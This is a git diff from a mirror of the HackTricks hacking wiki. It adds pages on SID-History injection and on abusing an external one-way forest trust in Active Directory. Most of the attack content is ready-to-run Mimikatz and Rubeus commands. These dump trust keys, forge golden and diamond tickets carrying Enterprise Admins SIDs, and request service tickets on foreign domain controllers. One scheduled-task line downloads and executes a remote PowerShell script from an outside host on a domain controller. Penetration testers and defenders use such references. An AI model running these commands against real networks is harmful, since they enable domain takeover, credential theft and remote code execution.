mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
GitBook: [#3391] No subject
This commit is contained in:
parent
89f7247f49
commit
092406ed0b
4 changed files with 266 additions and 39 deletions
|
@ -165,6 +165,7 @@
|
|||
* [DCSync](windows-hardening/active-directory-methodology/dcsync.md)
|
||||
* [Diamond Ticket](windows-hardening/active-directory-methodology/diamond-ticket.md)
|
||||
* [DSRM Credentials](windows-hardening/active-directory-methodology/dsrm-credentials.md)
|
||||
* [External Forest Domain - OneWay (Inbound)](windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md)
|
||||
* [Forged Certificates](windows-hardening/active-directory-methodology/forged-certificates.md)
|
||||
* [Golden Ticket](windows-hardening/active-directory-methodology/golden-ticket.md)
|
||||
* [Kerberos Authentication](windows-hardening/active-directory-methodology/kerberos-authentication.md)
|
||||
|
@ -177,6 +178,7 @@
|
|||
* [Privileged Accounts and Token Privileges](windows-hardening/active-directory-methodology/privileged-accounts-and-token-privileges.md)
|
||||
* [Resource-based Constrained Delegation](windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md)
|
||||
* [Security Descriptors](windows-hardening/active-directory-methodology/security-descriptors.md)
|
||||
* [SID-History Injection](windows-hardening/active-directory-methodology/sid-history-injection.md)
|
||||
* [Silver Ticket](windows-hardening/active-directory-methodology/silver-ticket.md)
|
||||
* [Skeleton Key](windows-hardening/active-directory-methodology/skeleton-key.md)
|
||||
* [Unconstrained Delegation](windows-hardening/active-directory-methodology/unconstrained-delegation.md)
|
||||
|
|
|
@ -355,7 +355,7 @@ Note that if you use wrong data, pretty ugly logs will appear.
|
|||
|
||||
## Forest Privilege Escalation - Domain Trusts
|
||||
|
||||
Microsoft considers that the **domain isn't a Security Boundary**, the **Forest is the security Boundary**. This means that **if you compromise a domain inside a Forest you are going to be able to compromise the entire Forest**.
|
||||
Microsoft considers that the **domain isn't a Security Boundary**, the **Forest is the security Boundary**. This means that **if you compromise a domain inside a Forest you might be able to compromise the entire Forest**.
|
||||
|
||||
### Basic Information
|
||||
|
||||
|
@ -372,6 +372,8 @@ When a **user** tries to **access** a **service** on the **trusting domain** it
|
|||
|
||||
It's important to notice that **a trust can be 1 way or 2 ways**. In the 2 ways options, both domains will trust each other, but in the **1 way** trust relation one of the domains will be the **trusted** and the other the **trusting** domain. In the last case, **you will only be able to access resources inside the trusting domain from the trusted one**.
|
||||
|
||||
If Domain A trusts Domain B, A is the trusting domain and B ins the trusted one. Moreover, in **Domain A**, this would be an **Outbound trust**; and in **Domain B**, this would be an **Inbound trust**.
|
||||
|
||||
A trust relationship can also be **transitive** (A trust B, B trust C, then A trust C) or **non-transitive**.
|
||||
|
||||
**Different trusting relationships:**
|
||||
|
@ -379,7 +381,7 @@ A trust relationship can also be **transitive** (A trust B, B trust C, then A tr
|
|||
* **Parent/Child** – part of the same forest – a child domain retains an implicit two-way transitive trust with its parent. This is probably the most common type of trust that you’ll encounter.
|
||||
* **Cross-link** – aka a “shortcut trust” between child domains to improve referral times. Normally referrals in a complex forest have to filter up to the forest root and then back down to the target domain, so for a geographically spread out scenario, cross-links can make sense to cut down on authentication times.
|
||||
* **External** – an implicitly non-transitive trust created between disparate domains. “[External trusts provide access to resources in a domain outside of the forest that is not already joined by a forest trust.](https://technet.microsoft.com/en-us/library/cc773178\(v=ws.10\).aspx)” External trusts enforce SID filtering, a security protection covered later in this post.
|
||||
* **Tree-root** – an implicit two-way transitive trust between the forest root domain and the new tree root you’re adding. I haven’t encountered tree-root trusts too often, but from the [Microsoft documentation](https://technet.microsoft.com/en-us/library/cc773178\(v=ws.10\).aspx), they’re created when you when you create a new domain tree in a forest. These are intra-forest trusts, and they [preserve two-way transitivity](https://technet.microsoft.com/en-us/library/cc757352\(v=ws.10\).aspx) while allowing the tree to have a separate domain name (instead of child.parent.com).
|
||||
* **Tree-root** – an implicit two-way transitive trust between the forest root domain and the new tree root you’re adding. I haven’t encountered tree-root trusts too often, but from the [Microsoft documentation](https://technet.microsoft.com/en-us/library/cc773178\(v=ws.10\).aspx), they’re created when you create a new domain tree in a forest. These are intra-forest trusts, and they [preserve two-way transitivity](https://technet.microsoft.com/en-us/library/cc757352\(v=ws.10\).aspx) while allowing the tree to have a separate domain name (instead of child.parent.com).
|
||||
* **Forest** – a transitive trust between one forest root domain and another forest root domain. Forest trusts also enforce SID filtering.
|
||||
* **MIT** – a trust with a non-Windows [RFC4120-compliant](https://tools.ietf.org/html/rfc4120) Kerberos domain. I hope to dive more into MIT trusts in the future.
|
||||
|
||||
|
@ -398,48 +400,37 @@ There are three **main** ways that security principals (users/groups/computer) f
|
|||
|
||||
### Child-to-Parent forest privilege escalation
|
||||
|
||||
#### SID-History Injection
|
||||
```
|
||||
Get-DomainTrust
|
||||
|
||||
Also, notice that there are **2 trusted keys**, one for _Child --> Parent_ and another one for P\_arent --> Child\_.
|
||||
SourceName : sub.domain.local --> current domain
|
||||
TargetName : domain.local --> foreign domain
|
||||
TrustType : WINDOWS_ACTIVE_DIRECTORY
|
||||
TrustAttributes : WITHIN_FOREST --> WITHIN_FOREST: Both in the same forest
|
||||
TrustDirection : Bidirectional --> Trust direction (2ways in this case)
|
||||
WhenCreated : 2/19/2021 1:28:00 PM
|
||||
WhenChanged : 2/19/2021 1:28:00 PM
|
||||
```
|
||||
|
||||
{% hint style="warning" %}
|
||||
There are **2 trusted keys**, one for _Child --> Parent_ and another one for _Parent_ --> _Child_.\
|
||||
You can the one used by the current domain them with:
|
||||
|
||||
```bash
|
||||
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
|
||||
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
|
||||
```
|
||||
{% endhint %}
|
||||
|
||||
```bash
|
||||
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:7ef5be456dc8d7450fb8f5f7348746c5 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'
|
||||
/domain:<Current domain>
|
||||
/sid:<SID of current domain>
|
||||
/sids:<SID of the Enterprise Admins group of the parent domain>
|
||||
/rc4:<Trusted key>
|
||||
/user:Administrator
|
||||
/service:<target service>
|
||||
/target:<Other domain>
|
||||
/ticket:C:\path\save\ticket.kirbi
|
||||
```
|
||||
#### SID-History Injection
|
||||
|
||||
For finding the **SID** of the **"Enterprise Admins"** group you can find the **SID** of the **root domain** and set it in S-1-5-21\_root domain\_-519. For example, from root domain SID _S-1-5-21-280534878-1496970234-700767426_ the "Enterprise Admins"group SID is _S-1-5-21-280534878-1496970234-700767426-519_
|
||||
Escalate as Enterprise admin to the child/parent domain abusing the trust with SID-History injection:
|
||||
|
||||
[http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/)
|
||||
{% content-ref url="sid-history-injection.md" %}
|
||||
[sid-history-injection.md](sid-history-injection.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
```bash
|
||||
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
|
||||
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
|
||||
ls \\mcorp-dc.moneycorp.local\c$
|
||||
```
|
||||
|
||||
Escalate to DA of root or Enterprise admin using the KRBTGT hash of the compromised domain:
|
||||
|
||||
```bash
|
||||
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
|
||||
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
|
||||
gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local
|
||||
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
|
||||
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
|
||||
```
|
||||
|
||||
#### Exploit writeable Configration NC
|
||||
#### Exploit writeable Configuration NC
|
||||
|
||||
The Configuration NC is the primary repository for configuration information for a forest and is replicated to every DC in the forest. Additionally, every writable DC (not read-only DCs) in the forest holds a writable copy of the Configuration NC. Exploiting this require running as SYSTEM on a (child) DC.
|
||||
|
||||
|
@ -450,13 +441,13 @@ It is possible to compromise the root domain in various ways. Examples:
|
|||
* [Schema attack](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent)
|
||||
* Exploit ADCS - Create/modify certificate template to allow authentication as any user (e.g. Enterprise Admins)
|
||||
|
||||
### External Forest Domain Privilege escalation
|
||||
### External Forest Domain - One-Way (Inbound)
|
||||
|
||||
In this case you can **sign with** the **trusted** key a **TGT impersonating** the **Administrator** user of the current domain. In this case you **won't always get Domain Admins privileges in the external domain**, but **only** the privileges the Administrator user of your current domain **was given** in the external domain.
|
||||
In this scenario **your domain is trusted** by an external one giving you **undetermined permissions** over it. You will need to find **which principals of your domain have which access over the external domain** and then try to exploit it:
|
||||
|
||||
```bash
|
||||
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'
|
||||
```
|
||||
{% content-ref url="external-forest-domain-oneway-inbound.md" %}
|
||||
[external-forest-domain-oneway-inbound.md](external-forest-domain-oneway-inbound.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Attack one-way trusted domain/forest (Trust account attack)
|
||||
|
||||
|
@ -541,6 +532,10 @@ If you don't execute this from a Domain Controller, ATA is going to catch you, s
|
|||
* [Python script to enumerate active directory](https://github.com/ropnop/windapsearch)
|
||||
* [Python script to enumerate active directory](https://github.com/CroweCybersecurity/ad-ldap-enum)
|
||||
|
||||
## References
|
||||
|
||||
* [http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
|
|
@ -0,0 +1,132 @@
|
|||
# External Forest Domain - OneWay (Inbound)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
In this scenario an external domain is trusting you, so you can get some kind of access over it.
|
||||
|
||||
## Enumeration
|
||||
|
||||
First of all, you need to **enumerate** the **trust**:
|
||||
|
||||
```powershell
|
||||
Get-DomainTrust
|
||||
SourceName : a.domain.local --> Current domain
|
||||
TargetName : domain.external --> Destination domain
|
||||
TrustType : WINDOWS-ACTIVE_DIRECTORY
|
||||
TrustAttributes :
|
||||
TrustDirection : Inbound --> Inboud trust
|
||||
WhenCreated : 2/19/2021 10:50:56 PM
|
||||
WhenChanged : 2/19/2021 10:50:56 PM
|
||||
|
||||
# Get name of DC of the other domain
|
||||
Get-DomainComputer -Domain domain.external -Properties DNSHostName
|
||||
dnshostname
|
||||
-----------
|
||||
dc.domain.external
|
||||
|
||||
# Groups that contain users outside of its domain and return its members
|
||||
Get-DomainForeignGroupMember -Domain domain.external
|
||||
GroupDomain : domain.external
|
||||
GroupName : Administrators
|
||||
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=domain,DC=external
|
||||
MemberDomain : domain.external
|
||||
MemberName : S-1-5-21-3263068140-2042698922-2891547269-1133
|
||||
MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain,
|
||||
DC=external
|
||||
|
||||
# Get name of the principal in the current domain member of the cross-domain group
|
||||
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
|
||||
DEV\External Admins
|
||||
|
||||
# Get members of the cros-domain group
|
||||
Get-DomainGroupMember -Identity "External Admins" | select MemberName
|
||||
MemberName
|
||||
----------
|
||||
crossuser
|
||||
|
||||
# Lets list groups members
|
||||
## Check how the "External Admins" is part of the Administrators group in that DC
|
||||
Get-NetLocalGroupMember -ComputerName dc.domain.external
|
||||
ComputerName : dc.domain.external
|
||||
GroupName : Administrators
|
||||
MemberName : SUB\External Admins
|
||||
SID : S-1-5-21-3263068140-2042698922-2891547269-1133
|
||||
IsGroup : True
|
||||
IsDomain : True
|
||||
|
||||
# You may also enumerate where foreign groups and/or users have been assigned
|
||||
# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.
|
||||
```
|
||||
|
||||
In the previous enumeration it was found that the user **`crossuser`** is inside the **`External Admins`** group who has **Admin access** inside the **DC of the external domain**.
|
||||
|
||||
## Impersonation
|
||||
|
||||
### With signing key
|
||||
|
||||
{% hint style="warning" %}
|
||||
As a reminder, you can get the signing key with 
|
||||
|
||||
```powershell
|
||||
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
|
||||
```
|
||||
{% endhint %}
|
||||
|
||||
You could **sign with** the **trusted** key a **TGT impersonating** the user of the current domain.
|
||||
|
||||
```bash
|
||||
# Get a TGT for the cross-domain privileged user to the other domain
|
||||
Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'
|
||||
|
||||
# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
|
||||
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
|
||||
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap
|
||||
|
||||
# Now you have a TGS to access the CIFS service of the domain controller
|
||||
```
|
||||
|
||||
### Full way impersonating the user
|
||||
|
||||
```bash
|
||||
# Get a TGT of the user with cross-domain permissions
|
||||
Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap
|
||||
|
||||
# Get a TGT from the current domain for the target domain for the user
|
||||
Rubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap
|
||||
|
||||
# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
|
||||
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
|
||||
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap
|
||||
|
||||
# Now you have a TGS to access the CIFS service of the domain controller
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
|
@ -0,0 +1,98 @@
|
|||
# SID-History Injection
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
SID History was designed to support migration scenarios, where a user would be moved from one domain to another. To preserve access to resources in the "old" domain, the **user's previous SID would be added to the SID History** of their new account. So when creating such a ticket, the SID of a privileged group (EAs, DAs, etc) in the parent domain can be added that will **grant access to all resources in the parent**.
|
||||
|
||||
This can be achieved using either a [**Golden**](sid-history-injection.md#golden-ticket) or [**Diamond Ticket**](sid-history-injection.md#diamond-ticket).
|
||||
|
||||
For finding the **SID** of the **"Enterprise Admins"** group you can find the **SID** of the **root domain** and set it in `S-1-5-21-<root domain>-519`. For example, from root domain SID `S-1-5-21-280534878-1496970234-700767426` the "Enterprise Admins"group SID is `S-1-5-21-280534878-1496970234-700767426-519`
|
||||
|
||||
Another way yo find the SID of a group of the other domain (for example "Domain Admins") is with:
|
||||
|
||||
```powershell
|
||||
Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid
|
||||
```
|
||||
|
||||
#### Golden Ticket
|
||||
|
||||
```powershell
|
||||
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:7ef5be456dc8d7450fb8f5f7348746c5 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'
|
||||
# /domain:<Current domain>
|
||||
# /sid:<SID of current domain>
|
||||
# /sids:<SID of the Enterprise Admins group of the parent domain>
|
||||
# /rc4:<Trusted key>
|
||||
# /aer256:<AES hash> - This or /rc4
|
||||
# /user:Administrator
|
||||
# /service:<target service>
|
||||
# /target:<Other domain>
|
||||
# /ticket:C:\path\save\ticket.kirbi
|
||||
|
||||
# Mimikatz example using aes and different TGT timings for opsec
|
||||
kerberos::golden /user:Administrator /domain:current.domain.io /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-1874506631-3219952063-538504511-512 /aes256:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /startoffset:-10 /endin:600 /renewmax:10080 /ticket:doamin.kirbi
|
||||
```
|
||||
|
||||
For more info about golden tickets check:
|
||||
|
||||
{% content-ref url="golden-ticket.md" %}
|
||||
[golden-ticket.md](golden-ticket.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
#### Diamond Ticket
|
||||
|
||||
```powershell
|
||||
# Use the /sids param
|
||||
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap
|
||||
```
|
||||
|
||||
For more info about diamond tickets check:
|
||||
|
||||
{% content-ref url="diamond-ticket.md" %}
|
||||
[diamond-ticket.md](diamond-ticket.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
```bash
|
||||
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
|
||||
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
|
||||
ls \\mcorp-dc.moneycorp.local\c$
|
||||
```
|
||||
|
||||
Escalate to DA of root or Enterprise admin using the KRBTGT hash of the compromised domain:
|
||||
|
||||
```bash
|
||||
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
|
||||
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
|
||||
gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local
|
||||
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
|
||||
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
Loading…
Reference in a new issue